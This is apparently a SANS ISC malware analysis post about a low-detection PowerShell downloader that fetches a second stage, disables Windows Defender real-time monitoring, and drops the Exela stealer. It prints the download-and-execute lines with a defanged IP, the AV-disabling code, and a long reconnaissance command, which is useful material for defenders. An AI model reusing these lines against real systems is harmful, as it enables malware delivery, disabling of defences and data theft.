Some simple PowerShell scripts might deliver nasty content if executed by the target. I found a very simple one (with a low VT score of 8/65):
$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add(“X-Requested-With”, “PowerShell”)
$script = $webclient.DownloadString(“hxxp://147[.]45[.]159[.]206/open.ps1”)
Invoke-Expression $script
The file “open.ps1” is downloaded from Russia and contains comments in Russian like “Function of real-life security protection”. It will try to disable the antivirus or, if not possible, it will ask the victim to do it!
// Decoded: “Press d when u turn off Tamper Protect!”
$ready = Read-Host
([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(“UHJlc3MgZCB3aGVuIHUgdHVybiBvZmYgVGFtcGVyIFByb3RlY3Qh”)))
if ($ready -eq “d”) {
Try {
Set-MpPreference -DisableRealtimeMonitoring $true
Write-Host “1”
}
Catch {
Write-Host “2”
}
}
else {
// Decoded: “Canceled!”
Write-Host ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(“Q2FuY2VsZWQh”)))
exit
}
Then, the script tries to download two PE files:
cmd.exe (SHA256: 97d6e2d922c2f69cb84341b238966555820f0b46375a9e0e1a1a19a5f42a8f96)
service.exe (SHA256: de223760fd87d21d3548ab96e810f7c0c16aeea156905845d2e3c81e1e7df663)
“cmd.exe” is a self-extracting RAR archive:
remnux@remnux:MalwareZoo/20240726$ rar t cmd.exe
RAR 5.50 Copyright (c) 1993-2017 Alexander Roshal 11 Aug 2017
Trial version Type ‘rar -?’ for help
Testing archive cmd.exe
Testing comCommon.exe OK
Testing OejMizBn6qpQO.vbe OK
Testing e0FFDTJuwoKvrdf9FE4ACLcGB7vDN5I0giWGmO2aDyI3QEuN.bat OK
All OK
It communicates with solararbx[.]online (%%ip:37.140.192.207%%). At this time, I’m not sure about the purpose of the RAR archive.
“service.exe” is the Exela[1] stealer, developed in Python and compiled into a PE file. It uses Discord as C2 channel. Reconnaissance is performed via a simple script:
C:Windowssystem32cmd.exe /c “echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:WINDOWSSystem32driversetchosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config”
[1] https://github.com/quicaxd/Exela-V2.0
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.